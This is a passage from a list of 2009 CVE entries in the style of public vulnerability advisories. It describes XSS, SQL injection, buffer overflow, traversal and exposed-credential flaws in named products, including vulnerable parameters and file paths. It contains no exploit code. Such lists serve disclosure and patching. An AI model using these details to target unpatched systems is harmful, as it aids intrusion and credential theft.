4.3.0.CP07 allows remote attackers to inject arbitrary web script or HTML via the filter parameter, related to the key property and the position of quote and colon characters. [CVE-2009-1367] Cross-site scripting (XSS) vulnerability in index.php in moziloCMS 1.11 allows remote attackers to inject arbitrary web script or HTML via the query parameter in search action, a different issue than CVE-2008-6127.2a. [CVE-2009-1366] Cross-site scripting (XSS) vulnerability in Website\admin\Sales\paypalipn.aspx in DotNetNuke (DNN) before 4.9.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "name/value pairs" and "paypal IPN functionality." [CVE-2009-1353] Buffer overflow in the http_parse_hex function in libz/misc.c in Zervit Webserver 0.02 allows remote attackers to cause a denial of service (daemon crash) via a long URI, related to http.c. [CVE-2009-1349] Cross-site scripting (XSS) vulnerability in C2Net Stronghold 2.3 allows remote attackers to inject arbitrary web script or HTML via the URI. [CVE-2009-1344] Cross-site scripting (XSS) vulnerability in the Localization client module 5.x before 5.x-1.2 and 6.x before 6.x-1.7, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via input to the translation functionality. [CVE-2009-1343] Cross-site scripting (XSS) vulnerability in the Print (aka Printer, e-mail and PDF versions) module 5.x before 5.x-4.5 and 6.x before 6.x-1.5, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via content titles. [CVE-2009-1342] Cross-site scripting (XSS) vulnerability in the CCK comment reference module 6.x before 6.x-1.2, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via certain comment titles associated with a node edit form. [CVE-2009-1334] Cross-site scripting (XSS) vulnerability in login/FilepathLogin.html in IBM Tivoli Continuous Data Protection (CDP) for Files 3.1.4.0 allows remote attackers to inject arbitrary web script or HTML via the reason parameter. [CVE-2009-1323] SQL injection vulnerability in body.asp in Web File Explorer 3.1 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2009-1322] ASP Product Catalog 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing user credentials via a direct request for database/aspProductCatalog.mdb. [CVE-2009-1321] Cross-site scripting (XSS) vulnerability in search.asp in ASP Product Catalog 1.0 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. [CVE-2009-1320] Multiple cross-site scripting (XSS) vulnerabilities in include/zstore.php in Zazzle Store Builder 1.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) gridPage and (2) gridSort parameters. NOTE: some of these details are obtained from third party information. [CVE-2009-1315] Multiple cross-site scripting (XSS) vulnerabilities in AbleSpace 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) gid parameter to groups_profile.php, (2) cat_id and (3) razd_id parameters to adv_cat.php, and the (4) URL to blogs_full.php. [CVE-2009-1314] body.asp in Web File Explorer 3.1 allows remote attackers to create arbitrary files and execute arbitrary code via the savefile action with a file parameter containing a filename that has an executable extension. [CVE-2009-1311] Mozilla Firefox before 3.0.9 and SeaMonkey before 1.1.17 allow user-assisted remote attackers to obtain sensitive information via a web page with an embedded frame, which causes POST data from an outer page to be sent to the inner frame's URL during a SAVEMODE_FILEONLY save of the inner frame. [CVE-2009-1310] Cross-site scripting (XSS) vulnerability in the MozSearch plugin implementation in Mozilla Firefox before 3.0.9 allows user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SearchForm element. [CVE-2009-1308] Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.0.9, Thunderbird, and SeaMonkey allows remote attackers to inject arbitrary web script or HTML via vectors involving XBL JavaScript bindings and remote stylesheets, as exploited in the wild by a March 2009 eBay listing. [CVE-2009-1307] The view-source: URI implementation in Mozilla Firefox before 3.0.9, Thunderbird, and SeaMonkey does not properly implement the Same Origin Policy, which allows remote attackers to (1) bypass crossdomain.xml restrictions and connect to arbitrary web sites via a Flash file [CVE-2009-1294] Multiple cross-site scripting (XSS) vulnerabilities in web/guest/home in the Liferay 4.3.0 portal in Novell Teaming 1.0 through SP3 (1.0.3) allow remote attackers to inject arbitrary web script or HTML via the (1) p_p_state or (2) p_p_mode parameters. [CVE-2009-1293] The web login functionality (c/portal/login) in Novell Teaming 1.0 through SP3 (1.0.3) generates different error messages depending on whether the username is valid or invalid, which makes it easier for remote attackers to enumerate usernames. [CVE-2009-1291] Stack-based buffer overflow in TIBCO SmartSockets before 6.8.2, SmartSockets Product Family (aka RTworks) before 4.0.5, and Enterprise Message Service (EMS) 4.0.0 through 5.1.1, as used in SmartSockets Server and RTworks Server (aka RTserver), SmartSockets client libraries and add-on products, RTworks libraries and components, EMS Server (aka tibemsd), SmartMQ, iProcess Engine, ActiveMatrix products, and CA Enterprise Communicator, allows remote attackers to execute arbitrary code via "inbound data," as demonstrated by requests to the UDP interface of the RTserver component, and data injection into the TCP stream to tibemsd. [CVE-2009-1289] private/login.ssi in the Advanced Management Module (AMM) on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allows remote attackers to discover the access roles and scopes of arbitrary user accounts via a modified WEBINDEX parameter. [CVE-2009-1288] Multiple cross-site scripting (XSS) vulnerabilities in the Advanced Management Module (AMM) on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allow remote attackers to inject arbitrary web script or HTML via (1) the username in a login action or (2) the PATH parameter to private/file_management.ssi in the File manager. [CVE-2009-1287] Cross-site scripting (XSS) vulnerability in Cisco Subscriber Edge Services Manager (SESM) allows remote attackers to inject arbitrary web script or HTML via the URI. NOTE: some of these details are obtained from third party information. [CVE-2009-1281] Cross-site scripting (XSS) vulnerability in glFusion before 1.1.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-1279] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! 1.5 through 1.5.9 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors to the (1) com_admin component, (2) com_search component when "Gather Search Statistics" is enabled, and (3) the category view in the com_content component. [CVE-2009-1261] Multiple cross-site scripting (XSS) vulnerabilities in Web Help Desk 9.1.22 (evaluation version) allow remote attackers to inject arbitrary web script or HTML via the (1) Report Name, (2) Asset No., and (3) Full Name fields in a Models action. NOTE: the provenance of this information is unknown [CVE-2009-1249] Cross-site scripting (XSS) vulnerability in Feed element mapper 5.x before 5.x-1.1, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via the content title in admin/content/node-type/nodetype/map. [CVE-2009-1238] Race condition in the HFS vfs sysctl interface in XNU 1228.8.20 and earlier on Apple Mac OS X 10.5.6 and earlier allows local users to cause a denial of service (kernel memory corruption) by simultaneously executing the same HFS_SET_PKG_EXTENSIONS code path in multiple threads, which is problematic because of lack of mutex locking for an unspecified global variable. [CVE-2009-1228] Cross-site scripting (XSS) vulnerability in register.php in Arcadwy Arcade Script CMS allows remote attackers to inject arbitrary web script or HTML via the username field (user_name parameter). [CVE-2009-1227] DISPUTED NOTE: this issue has been disputed by the vendor. Buffer overflow in the PKI Web Service in Check Point Firewall-1 PKI Web Service allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) Authorization or (2) Referer HTTP header to TCP port 18624. NOTE: the vendor has disputed this issue, stating "Check Point Security Alert Team has analyzed this report. We've tried to reproduce the attack on all VPN-1 versions from NG FP2 and above with and without HFAs. The issue was not reproduced. We have conducted a thorough analysis of the relevant code and verified that we are secure against this attack. We consider this attack to pose no risk to Check Point customers." In addition, the original researcher, whose reliability is unknown as of 20090407, also states that the issue "was discovered during a pen-test where the client would not allow further analysis." [CVE-2009-1225] Cross-site scripting (XSS) vulnerability in index.php in Turnkey Ebook Store 1.1 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter in a search action. [CVE-2009-1223] aspWebCalendar Free Edition stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing user credentials via a direct request for calendar/calendar.mdb. [CVE-2009-1222] Directory traversal vulnerability in index.php in webEdition 6.0.0.4 and earlier, when register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary files via a .. (dot dot) in the WE_LANGUAGE parameter. [CVE-2009-1220] Cross-site scripting (XSS) vulnerability in +webvpn+/index.html in WebVPN on the Cisco Adaptive Security Appliances (ASA) 5520 with software 7.2(4)30 and earlier 7.2 versions including 7.2(2)22, and 8.0(4)28 and earlier 8.0 versions, when clientless mode is enabled, allows remote attackers to inject arbitrary web script or HTML via the Host HTTP header. [CVE-2009-1219] Sun Calendar Express Web Server in Sun ONE Calendar Server 6.0 and Sun Java System Calendar Server 6 2004Q2 through 6.3-7.01 allows remote attackers to cause a denial of service (daemon crash) via multiple requests to the default URI with alphabetic characters in the tzid parameter. [CVE-2009-1218] Multiple cross-site scripting (XSS) vulnerabilities in Sun Calendar Express Web Server in Sun ONE Calendar Server 6.0 and Sun Java System Calendar Server 6 2004Q2 through 6.3-7.01 allow remote attackers to inject arbitrary web script or HTML via (1) the fmt-out parameter to login.wcap or (2) the date parameter to command.shtml. [CVE-2009-1211] Blue Coat ProxySG, when transparent interception mode is enabled, uses the HTTP Host header to determine the remote endpoint, which allows remote attackers to bypass access controls for Flash, Java, Silverlight, and probably other technologies, and possibly communicate with restricted intranet sites, via a crafted web page that causes a client to send HTTP requests with a modified Host header. [CVE-2009-1209] Stack-based buffer overflow in W3C Amaya Web Browser 11.1 allows remote attackers to execute arbitrary code via a script tag with a long defer attribute. [CVE-2009-1204] Cross-site scripting (XSS) vulnerability in TikiWiki (Tiki) CMS/Groupware 2.2 allows remote attackers to inject arbitrary web script or HTML via the PHP_SELF portion of a URI to (1) tiki-galleries.php, (2) tiki-list_file_gallery.php, (3) tiki-listpages.php, and (4) tiki-orphan_pages.php. [CVE-2009-1203] WebVPN on the Cisco Adaptive Security Appliances (ASA) device with software 8.0(4), 8.1.2, and 8.2.1 does not properly distinguish its own login screen from the login screens it produces for third-party (1) FTP and (2) CIFS servers, which makes it easier for remote attackers to trick a user into sending WebVPN credentials to an arbitrary server via a URL associated with that server, aka Bug ID CSCsy80709. [CVE-2009-1202] WebVPN on the Cisco Adaptive Security Appliances (ASA) device with software 8.0(4), 8.1.2, and 8.2.1 allows remote attackers to bypass certain protection mechanisms involving URL rewriting and HTML rewriting, and conduct cross-site scripting (XSS) attacks, by modifying the first hex-encoded character in a /+CSCO+ URI, aka Bug ID CSCsy80705. [CVE-2009-1201] Eval injection vulnerability in the csco_wrap_js function in /+CSCOL+/cte.js in WebVPN on the Cisco Adaptive Security Appliances (ASA) device with software 8.0(4), 8.1.2, and 8.2.1 allows remote attackers to bypass a DOM wrapper and conduct cross-site scripting (XSS) attacks by setting CSCO_WebVPN['process'] to the name of a crafted function, aka Bug ID CSCsy80694. [CVE-2009-1175] Cross-site scripting (XSS) vulnerability in apps/web/vs_diag.cgi in the DAAP extension in Banshee 1.4.2 allows remote attackers to inject arbitrary web script or HTML via the server parameter, which is not properly handled in an error message. [CVE-2009-1174] The Web Services Security component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35 and 7.0 before 7.0.0.3 has an unspecified "security problem" in the XML digital-signature specification, which has unknown impact and attack vectors. [CVE-2009-1173] IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.3 uses weak permissions (777) for files associated with unspecified "interim fixes," which allows attackers to modify files that would not have been accessible if the intended 755 permissions were used. [CVE-2009-1172] The JAX-RPC WS-Security runtime in the Web Services Security component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.23 and 7.0 before 7.0.0.3, when APAR PK41002 is installed, does not properly validate UsernameToken objects, which has unknown impact and attack vectors. [CVE-2009-1162] Cross-site scripting (XSS) vulnerability in the Spam Quarantine login page in Cisco IronPort AsyncOS before 6.5.2 on Series C, M, and X appliances allows remote attackers to inject arbitrary web script or HTML via the referrer parameter. [CVE-2009-1150] Multiple cross-site scripting (XSS) vulnerabilities in the export page (display_export.lib.php) in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allow remote attackers to inject arbitrary web script or HTML via the pma_db_filename_template cookie. [CVE-2009-1147] Unspecified vulnerability in vmci.sys in the Virtual Machine Communication Interface (VMCI) in VMware Workstation 6.5.1 and earlier, VMware Player 2.5.1 and earlier, VMware ACE 2.5.1 and earlier, and VMware Server 2.0.x before 2.0.1 build 156745 allows local users to gain privileges via unknown vectors. [CVE-2009-1136] The Microsoft Office Web Components Spreadsheet ActiveX control (aka OWC10 or OWC11), as distributed in Office XP SP3 and Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 Gold and SP1, and Office Small Business Accounting 2006, when used in Internet Explorer, allows remote attackers to execute arbitrary code via a crafted call to the msDataSourceObject method, as exploited in the wild in July and August 2009, aka "Office Web Components HTML Script Vulnerability." [CVE-2009-1135] Microsoft Internet Security and Acceleration (ISA) Server 2006 Gold and SP1, when Radius OTP is enabled, uses the HTTP-Basic authentication method, which allows remote attackers to gain the privileges of an arbitrary account, and access published web pages, via vectors involving attempted access to a network resource behind the ISA Server, aka "Radius OTP Bypass Vulnerability." [CVE-2009-1122] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.0 on Windows 2000 SP4 does not properly decode URLs, which allows remote attackers to bypass authentication, and possibly read or create files, via a crafted HTTP request, aka "IIS 5.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1535. [CVE-2009-1091] Cross-site scripting (XSS) vulnerability in upload.php in Rapidleech rev.36 and earlier allows remote attackers to inject arbitrary web script or HTML via the uploaded parameter. [CVE-2009-1085] Piwik 0.2.32 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the API key and other sensitive information via a direct request for misc/cron/archive.sh. [CVE-2009-1081] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Identity Manager (IdM) 7.0 through 8.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug IDs 19595 and 19661. [CVE-2009-1080] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Identity Manager (IdM) 7.0 through 8.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID 19033. [CVE-2009-1079] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Identity Manager (IdM) 7.0 through 8.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug IDs 19659, 19660, and 19683. [CVE-2009-1077] The Change My Password implementation in the admin interface in Sun Java System Identity Manager (IdM) 7.0 through 8.0 does not enforce the RequiresChallenge property setting, which allows remote authenticated users to change the passwords of other users, as demonstrated by changing the administrator's password. [CVE-2009-1070] Cross-site scripting (XSS) vulnerability in system/index.php in ExpressionEngine 1.6.4 through 1.6.6, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the avatar parameter. [CVE-2009-1069] Multiple cross-site scripting (XSS) vulnerabilities in the node edit form feature in Drupal Content Construction Kit (CCK) 6.x before 6.x-2.2, a module for Drupal, allow remote attackers to inject arbitrary web script or HTML via the (1) titles of candidate referenced nodes in the Node reference sub-module and the (2) names of candidate referenced users in the User reference sub-module. [CVE-2009-1067] Cross-site scripting (XSS) vulnerability in index.php in Pixie CMS 1.01a allows remote attackers to inject arbitrary web script or HTML via the x parameter. [CVE-2009-1055] Unspecified vulnerability in the web service in Sitecore CMS 5.3.1 rev. 071114 allows remote authenticated users to gain access to security databases, and obtain administrative and user credentials, via unknown vectors related to SOAP and XML requests. [CVE-2009-1053] chaozzDB 1.2 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing user credentials via a direct request for user.tsv. [CVE-2009-1052] FireAnt 1.3 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing user credentials via a direct request for user.tsv. [CVE-2009-1051] FubarForum 1.6 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing user credentials via a direct request for user.tsv. [CVE-2009-1047] Cross-site scripting (XSS) vulnerability in the Send by e-mail module in the "Printer, e-mail and PDF versions" module 5.x before 5.x-4.4 and 6.x before 6.x-1.4, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via vectors involving outbound HTML e-mail. [CVE-2009-1035] Cross-site scripting (XSS) vulnerability in the Tasklist module 5.x-1.x before 5.x-1.3 and 5.x-2.x before 5.x-2.0-alpha1, a module for Drupal, allows remote authenticated users to inject arbitrary web script or HTML via Cascading Style Sheets (CSS). [CVE-2009-1030] Cross-site scripting (XSS) vulnerability in the choose_primary_blog function in wp-includes/wpmu-functions.php in WordPress MU (WPMU) before 2.7 allows remote attackers to inject arbitrary web script or HTML via the HTTP Host header. [CVE-2009-1026] Multiple SQL injection vulnerabilities in login.php in Kim Websites 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters. [CVE-2009-1016] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote authenticated users to affect confidentiality, integrity, and availability, related to IIS. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is a stack-based buffer overflow involving an unspecified Server Plug-in and a crafted SSL certificate. [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow. [CVE-2009-1004] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3 allows remote attackers to affect confidentiality and integrity via unknown vectors. [CVE-2009-1003] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, and 9.0 allows remote attackers to affect integrity via unknown vectors related to "access to source code of web pages." [CVE-2009-1002] Unspecified vulnerability in Oracle BEA WebLogic Server 10.3, 10.0 Gold through MP1, 9.2 Gold through MP3, 9.1, 9.0, 8.1 Gold through SP6, and 7.0 Gold through SP7 allows remote attackers to gain privileges via unknown vectors. [CVE-2009-1001] Unspecified vulnerability in Oracle BEA WebLogic Portal 8.1 Gold through SP6 allows remote authenticated users to gain privileges via unknown vectors. [CVE-2009-0971] Cross-site scripting (XSS) vulnerability in futomi's CGI Cafe Access Analyzer CGI Standard Version 3.8.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2009-0945] Array index error in the insertItemBefore method in WebKit, as used in Apple Safari before 3.2.3 and 4 Public Beta, iPhone OS 1.0 through 2.2.1, iPhone OS for iPod touch 1.1 through 2.2.1, Google Chrome Stable before 1.0.154.65, and possibly other products allows remote attackers to execute arbitrary code via a document with a SVGPathList data structure containing a negative index in the (1) SVGTransformList, (2) SVGStringList, (3) SVGNumberList, (4) SVGPathSegList, (5) SVGPointList, or (6) SVGLengthList SVGList object, which triggers memory corruption. [CVE-2009-0941] The HP Embedded Web Server (EWS) on HP LaserJet Printers, Edgeline Printers, and Digital Senders has no management password by default, which makes it easier for remote attackers to obtain access. [CVE-2009-0940] Multiple cross-site request forgery (CSRF) vulnerabilities in the HP Embedded Web Server (EWS) on HP LaserJet Printers, Edgeline Printers, and Digital Senders allow remote attackers to hijack the intranet connectivity of arbitrary users for requests that (1) print documents via unknown vectors, (2) modify the network configuration via a NetIPChange request to hp/device/config_result_YesNo.html/config, or (3) change the password via the Password and ConfirmPassword parameters to hp/device/set_config_password.html/config. [CVE-2009-0934] Cross-site scripting (XSS) vulnerability in ejabberd before 2.0.4 allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to links and MUC logs. [CVE-2009-0931] Cross-site scripting (XSS) vulnerability in the tag cloud search script (horde/services/portal/cloud_search.php) in Horde before 3.2.4 and 3.3.3, and Horde Groupware before 1.1.5, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-0930] Multiple cross-site scripting (XSS) vulnerabilities in Horde IMP before 4.2.2 and 4.3.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors to (1) smime.php, (2) pgp.php, and (3) message.php. [CVE-2009-0917] Cross-site scripting (XSS) vulnerability in DFLabs PTK 1.0.0 through 1.0.4 allows remote attackers to inject arbitrary web script or HTML by providing a forensic image containing HTML documents, which are rendered in web browsers during inspection by PTK. NOTE: the vendor states that the product is intended for use in a laboratory with "no contact from / to internet." [CVE-2009-0910] Heap-based buffer overflow in the VNnc Codec in VMware Workstation 6.5.x before 6.5.2 build 156735, VMware Player 2.5.x before 2.5.2 build 156735, VMware ACE 2.5.x before 2.5.2 build 156735, and VMware Server 2.0.x before 2.0.1 build 156745 allows remote attackers to execute arbitrary code via a crafted web page or video file, aka ZDI-CAN-436. [CVE-2009-0909] Heap-based buffer overflow in the VNnc Codec in VMware Workstation 6.5.x before 6.5.2 build 156735, VMware Player 2.5.x before 2.5.2 build 156735, VMware ACE 2.5.x before 2.5.2 build 156735, and VMware Server 2.0.x before 2.0.1 build 156745 allows remote attackers to execute arbitrary code via a crafted web page or video file, aka ZDI-CAN-435. [CVE-2009-0906] The Service Component Architecture (SCA) feature pack for IBM WebSphere Application Server (WAS) SCA 1.0 before 1.0.0.3 allows remote authenticated users to bypass intended authentication.transport access restrictions and obtain unspecified access via unknown vectors. [CVE-2009-0905] IBM WebSphere MQ 6.0 before 6.0.2.8 and 7.0 before 7.0.1.0 does not properly handle long group names, which might allow local users to gain privileges by leveraging combinations of group names with the same initial substring. [CVE-2009-0904] The IBM Stax XMLStreamWriter in the Web Services component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.25 does not properly process XML encoding, which allows remote attackers to bypass intended access restrictions and possibly modify data via "XML fuzzing attacks" sent through SOAP requests. [CVE-2009-0903] IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.3, and the Feature Pack for Web Services for WAS 6.1 before 6.1.0.25, when a WS-Security policy is established at the operation level, does not properly handle inbound requests that lack a SOAPAction or WS-Addressing Action, which allows remote attackers to bypass intended access restrictions via a crafted request to a JAX-WS application. [CVE-2009-0900] Heap-based buffer overflow in the client in IBM WebSphere MQ 6.0 before 6.0.2.7 and 7.0 before 7.0.1.0 allows local users to gain privileges via crafted SSL information in a Client Channel Definition Table (CCDT) file. [CVE-2009-0899] IBM WebSphere Application Server (WAS) 6.1 through 6.1.0.24 and 7.0 through 7.0.0.4, IBM WebSphere Portal Server 5.1 through 6.0, and IBM Integrated Solutions Console (ISC) 6.0.1 do not properly set the IsSecurityEnabled security flag during migration of WebSphere Member Manager (WMM) to Virtual Member Manager (VMM) and a Federated Repository, which allows attackers to obtain sensitive information from repositories via unspecified vectors. [CVE-2009-0897] IBM WebSphere Partner Gateway (WPG) 6.1.0 before 6.1.0.1 and 6.1.1 before 6.1.1.1 allows remote authenticated users to obtain sensitive information via vectors related to the "schema DB2 instance id" and the bcgarchive (aka the archiver script). [CVE-2009-0896] Buffer overflow in the queue manager in IBM WebSphere MQ 6.x before 6.0.2.7 and 7.x before 7.0.1.0 allows remote attackers to execute arbitrary code via a crafted request. [CVE-2009-0892] The administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.23 and 7.0 before 7.0.0.3 allows attackers to hijack user sessions in "specific scenarios" related to a forced logout. [CVE-2009-0891] The Web Services Security component in IBM WebSphere Application Server 7.0 before Fix Pack 1 (7.0.0.1), 6.1 before Fix Pack 23 (6.1.0.23),and 6.0.2 before Fix Pack 33 (6.0.2.33) does not properly enforce (1) nonce and (2) timestamp expiration values in WS-Security bindings as stored in the com.ibm.wsspi.wssecurity.core custom property, which allows remote authenticated users to conduct session hijacking attacks. [CVE-2009-0877] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Communications Express allow remote attackers to inject arbitrary web script or HTML via the (1) Full Name or (2) Subject field. [CVE-2009-0868] CRLF injection vulnerability in the WebLink template in Fujitsu Jasmine2000 Enterprise Edition allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via unspecified vectors. [CVE-2009-0866] pHNews Alpha 1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for extra/genbackup.php. [CVE-2009-0862] Cross-site scripting (XSS) vulnerability in the hook_cntrlr_error_output function in modules/page/hooks/listeners.php in the admincp component in TangoCMS 2.2.x (aka Eagle) before 2.2.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information. [CVE-2009-0861] Cross-site scripting (XSS) vulnerability in phpDenora before 1.2.3 allows remote attackers to inject arbitrary web script or HTML via an IRC channel name. NOTE: some of these details are obtained from third party information. [CVE-2009-0857] Cross-site scripting (XSS) vulnerability in /prm/reports in the Performance Reporting Module (PRM) for Sun Management Center (SunMC) 3.6.1 and 4.0 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: this can be leveraged for access to the SunMC Web Console. [CVE-2009-0856] Multiple cross-site scripting (XSS) vulnerabilities in sample applications in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35, and 6.1 before 6.1.0.23 on z/OS, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-0855] Cross-site scripting (XSS) vulnerability in the administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.23 on z/OS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-0850] Cross-site scripting (XSS) vulnerability in BitDefender Internet Security 2009 allows user-assisted remote attackers to inject arbitrary web script or HTML via the filename of a virus-infected file, as demonstrated by a filename inside a (1) rar or (2) zip archive file. [CVE-2009-0830] Cross-site scripting (XSS) vulnerability in QuoteBook allows remote attackers to inject arbitrary web script or HTML via the (1) QuoteName and (2) QuoteText parameters to quotesadd.php. NOTE: the provenance of this information is unknown [CVE-2009-0828] QuoteBook stores quotes.inc under the web root with insufficient access control, which allows remote attackers to obtain sensitive database information, including user credentials, via a direct request. [CVE-2009-0827] PollHelper stores poll.inc under the web root with insufficient access control, which allows remote attackers to download the database file containing user credentials via a direct request. [CVE-2009-0826] BlogHelper stores common_db.inc under the web root with insufficient access control, which allows remote attackers to download the database file containing user credentials via a direct request. [CVE-2009-0818] Cross-site scripting (XSS) vulnerability in the taxonomy_theme_admin_table_builder function (taxonomy_theme_admin.inc) in Taxonomy Theme module before 5.x-1.2, a module for Drupal, allows remote authenticated users with the "administer taxonomy" permission, or the ability to create pages when tagging is enabled, to inject arbitrary web script or HTML via the Vocabulary name (name parameter) to index.php. NOTE: some of these details are obtained from third party information. [CVE-2009-0817] Cross-site scripting (XSS) vulnerability in the Protected Node module 5.x before 5.x-1.4 and 6.x before 6.x-1.5, a module for Drupal, allows remote authenticated users with "administer site configuration" permissions to inject arbitrary web script or HTML via the Password page info field, which is not properly handled by the protected_node_enterpassword function in protected_node.module. [CVE-2009-0814] Cross-site scripting (XSS) vulnerability in Widgets.aspx in Blogsa 1.0 Beta 3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchText parameter. [CVE-2009-0809] The Web Editor in Dassault Systemes ENOVIA SmarTeam V5 before Release 18 Service Pack 8, and possibly CATIA and other products, allows remote authenticated users to read the profile card of an object in the document class via a link that is sent from the owner of the document object. [CVE-2009-0805] Cross-site scripting (XSS) vulnerability in piCal 0.91h and earlier, a module for XOOPS, allows remote attackers to inject arbitrary web script or HTML via the event_id parameter in index.php. [CVE-2009-0804] Ziproxy 2.6.0, when transparent interception mode is enabled, uses the HTTP Host header to determine the remote endpoint, which allows remote attackers to bypass access controls for Flash, Java, Silverlight, and probably other technologies, and possibly communicate with restricted intranet sites, via a crafted web page that causes a client to send HTTP requests with a modified Host header. [CVE-2009-0803] SmoothWall SmoothGuardian, as used in SmoothWall Firewall, NetworkGuardian, and SchoolGuardian 2008, when transparent interception mode is enabled, uses the HTTP Host header to determine the remote endpoint, which allows remote attackers to bypass access controls for Flash, Java, Silverlight, and probably other technologies, and possibly communicate with restricted intranet sites, via a crafted web page that causes a client to send HTTP requests with a modified Host header. [CVE-2009-0802] Qbik WinGate, when transparent interception mode is enabled, uses the HTTP Host header to determine the remote endpoint, which allows remote attackers to bypass access controls for Flash, Java, Silverlight, and probably other technologies, and possibly communicate with restricted intranet sites, via a crafted web page that causes a client to send HTTP requests with a modified Host header. [CVE-2009-0801] Squid, when transparent interception mode is enabled, uses the HTTP Host header to determine the remote endpoint, which allows remote attackers to bypass access controls for Flash, Java, Silverlight, and probably other technologies, and possibly communicate with restricted intranet sites, via a crafted web page that causes a client to send HTTP requests with a modified Host header. [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI. [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." [CVE-2009-0767] Kipper 2.01 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing credentials via a direct request for job/config.data. [CVE-2009-0764] Multiple cross-site scripting (XSS) vulnerabilities in Kipper 2.01 allow remote attackers to inject arbitrary web script or HTML via the charm parameter to (1) index.php and (2) kipper.php. NOTE: the provenance of this information is unknown [CVE-2009-0763] Cross-site scripting (XSS) vulnerability in default.php in Kipper 2.01 allows remote attackers to inject arbitrary web script or HTML via the charm parameter. [CVE-2009-0762] Cross-site 